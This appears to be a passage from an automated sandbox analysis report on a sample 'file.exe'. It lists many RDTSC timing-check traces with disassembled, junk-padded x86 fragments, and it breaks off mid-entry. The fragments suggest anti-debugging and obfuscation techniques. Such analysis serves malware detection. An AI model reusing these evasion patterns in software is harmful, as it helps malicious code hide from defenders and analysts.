Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEE4B0 second address: DEE4D1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnc 00007F99D0DE6F26h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F99D0DE6F33h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEE4D1 second address: DEE4E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jng 00007F99D0D12E16h 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEE4E9 second address: DEE4F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnl 00007F99D0DE6F26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF8F59 second address: DF8F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F99D0D12E16h 0x0000000a popad 0x0000000b jmp 00007F99D0D12E1Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF8F79 second address: DF8F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF8F7F second address: DF8F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF8F85 second address: DF8F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF8F8A second address: DF8F96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F99D0D12E16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF8F96 second address: DF8F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0AFCF second address: E0AFD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0AFD4 second address: E0AFDD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E22786 second address: E22791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E22791 second address: E227B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F37h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F99D0DE6F2Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E227B9 second address: E227BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E227BD second address: E227DC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F99D0DE6F38h 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E22FEE second address: E22FF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E2804E second address: E28054 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E281D9 second address: E281EB instructions: 0x00000000 rdtsc 0x00000002 jp 00007F99D0D12E1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E281EB second address: E281EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E2C72F second address: E2C75A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99D0D12E1Fh 0x00000009 jmp 00007F99D0D12E25h 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E2C75A second address: E2C773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push ecx 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F99D0DE6F2Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E2C588 second address: E2C599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99D0D12E1Ch 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E2C599 second address: E2C59E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E46E6C second address: E46E93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E27h 0x00000007 jmp 00007F99D0D12E1Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E46E93 second address: E46EA8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F99D0DE6F2Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E49B15 second address: E49B2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F99D0D12E16h 0x00000009 jmp 00007F99D0D12E1Ch 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4984D second address: E4986F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F99D0DE6F26h 0x0000000a jng 00007F99D0DE6F2Ah 0x00000010 jo 00007F99D0DE6F32h 0x00000016 jp 00007F99D0DE6F26h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4986F second address: E49891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F99D0D12E1Ah 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jmp 00007F99D0D12E1Ah 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E49891 second address: E4989C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4989C second address: E498A2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5F60E second address: E5F61B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5F61B second address: E5F621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5F621 second address: E5F625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5F625 second address: E5F62B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E6432C second address: E64338 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E64338 second address: E64344 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F99D0D12E16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E64344 second address: E6435C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F99D0DE6F32h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E6435C second address: E64362 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E64362 second address: E6436E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E634E7 second address: E634EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E63A3C second address: E63A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E63A40 second address: E63A4F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jng 00007F99D0D12E16h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E63A4F second address: E63A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnp 00007F99D0DE6F32h 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F99D0DE6F26h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E63BD1 second address: E63BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E66F1E second address: E66F24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E67244 second address: E67248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E67248 second address: E6728D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dh, cl 0x0000000e push dword ptr [ebp+122D3970h] 0x00000014 mov edx, dword ptr [ebp+122D2638h] 0x0000001a call 00007F99D0DE6F29h 0x0000001f jmp 00007F99D0DE6F33h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push ecx 0x00000028 pushad 0x00000029 popad 0x0000002a pop ecx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E6728D second address: E67294 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E6BEE2 second address: E6BEE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E6BEE6 second address: E6BEEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E6BEEF second address: E6BF12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99D0DE6F38h 0x00000009 jl 00007F99D0DE6F26h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5570055 second address: 5570059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5570059 second address: 5570074 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5570074 second address: 55700F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007F99D0D12E27h 0x00000010 pop edx 0x00000011 call 00007F99D0D12E24h 0x00000016 mov bh, ch 0x00000018 pop ebx 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F99D0D12E1Fh 0x00000024 sub al, 0000002Eh 0x00000027 jmp 00007F99D0D12E29h 0x0000002c popfd 0x0000002d movzx ecx, dx 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55700F8 second address: 55700FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500118 second address: 5500174 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F99D0D12E20h 0x0000000f push eax 0x00000010 pushad 0x00000011 push ebx 0x00000012 jmp 00007F99D0D12E1Ch 0x00000017 pop esi 0x00000018 push edi 0x00000019 pushfd 0x0000001a jmp 00007F99D0D12E1Eh 0x0000001f sub esi, 5DE16B78h 0x00000025 jmp 00007F99D0D12E1Bh 0x0000002a popfd 0x0000002b pop eax 0x0000002c popad 0x0000002d xchg eax, ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500174 second address: 5500178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500178 second address: 550017E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 550017E second address: 5500184 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500184 second address: 55001B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F99D0D12E1Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55001B0 second address: 5500248 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F99D0DE6F37h 0x00000009 add eax, 63D74DFEh 0x0000000f jmp 00007F99D0DE6F39h 0x00000014 popfd 0x00000015 movzx esi, di 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push dword ptr [ebp+04h] 0x0000001e jmp 00007F99D0DE6F33h 0x00000023 push dword ptr [ebp+0Ch] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov ecx, ebx 0x0000002b pushfd 0x0000002c jmp 00007F99D0DE6F37h 0x00000031 sbb eax, 68703D6Eh 0x00000037 jmp 00007F99D0DE6F39h 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500248 second address: 5500266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500266 second address: 5500279 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500279 second address: 550027F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 550027F second address: 5500283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55002AF second address: 55002B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55002B3 second address: 55002B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5520C83 second address: 5520C89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55206E1 second address: 55206E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55206E5 second address: 55206EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55206EB second address: 5520732 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F99D0DE6F36h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 jmp 00007F99D0DE6F2Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 mov dl, ch 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5520732 second address: 552074E instructions: 0x00000000 rdtsc 0x00000002 call 00007F99D0D12E1Dh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ebx 0x00000011 mov dl, al 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55205A3 second address: 5520606 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F99D0DE6F36h 0x00000008 xor ax, E3A8h 0x0000000d jmp 00007F99D0DE6F2Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov dword ptr [esp], ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F99D0DE6F2Bh 0x00000022 xor si, F0EEh 0x00000027 jmp 00007F99D0DE6F39h 0x0000002c popfd 0x0000002d mov ax, B477h 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5520606 second address: 552061D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 38FA7E4Eh 0x00000008 mov dx, 315Ah 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 552061D second address: 5520623 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5520623 second address: 5520629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 552024A second address: 55202F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F99D0DE6F30h 0x00000009 sbb al, FFFFFF98h 0x0000000c jmp 00007F99D0DE6F2Bh 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F99D0DE6F38h 0x00000018 or ax, BCF8h 0x0000001d jmp 00007F99D0DE6F2Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 xchg eax, ebp 0x00000027 pushad 0x00000028 call 00007F99D0DE6F34h 0x0000002d mov ebx, eax 0x0000002f pop esi 0x00000030 pushfd 0x00000031 jmp 00007F99D0DE6F37h 0x00000036 sub cx, E61Eh 0x0000003b jmp 00007F99D0DE6F39h 0x00000040 popfd 0x00000041 popad 0x00000042 mov ebp, esp 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55202F3 second address: 55202F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55202F7 second address: 55202FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55202FB second address: 5520301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5520301 second address: 5520316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99D0DE6F31h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530216 second address: 553021C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560F27 second address: 5560F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560F2C second address: 5560F5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F99D0D12E29h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560F5E second address: 5560F94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F99D0DE6F37h 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560F94 second address: 5560F9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560F9A second address: 5560FB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99D0DE6F34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55403BB second address: 55403D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55403D0 second address: 55404E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F99D0DE6F2Eh 0x0000000f push eax 0x00000010 jmp 00007F99D0DE6F2Bh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 mov dx, ax 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F99D0DE6F2Eh 0x00000021 sbb si, 9528h 0x00000026 jmp 00007F99D0DE6F2Bh 0x0000002b popfd 0x0000002c call 00007F99D0DE6F38h 0x00000031 pop eax 0x00000032 popad 0x00000033 popad 0x00000034 mov ebp, esp 0x00000036 pushad 0x00000037 jmp 00007F99D0DE6F37h 0x0000003c mov edi, ecx 0x0000003e popad 0x0000003f mov eax, dword ptr [ebp+08h] 0x00000042 jmp 00007F99D0DE6F32h 0x00000047 and dword ptr [eax], 00000000h 0x0000004a pushad 0x0000004b jmp 00007F99D0DE6F2Eh 0x00000050 movzx ecx, bx 0x00000053 popad 0x00000054 and dword ptr [eax+04h], 00000000h 0x00000058 pushad 0x00000059 pushfd 0x0000005a jmp 00007F99D0DE6F33h 0x0000005f xor eax, 0EF3C68Eh 0x00000065 jmp 00007F99D0DE6F39h 0x0000006a popfd 0x0000006b mov esi, 0DCB7597h 0x00000070 popad 0x00000071 pop ebp 0x00000072 push eax 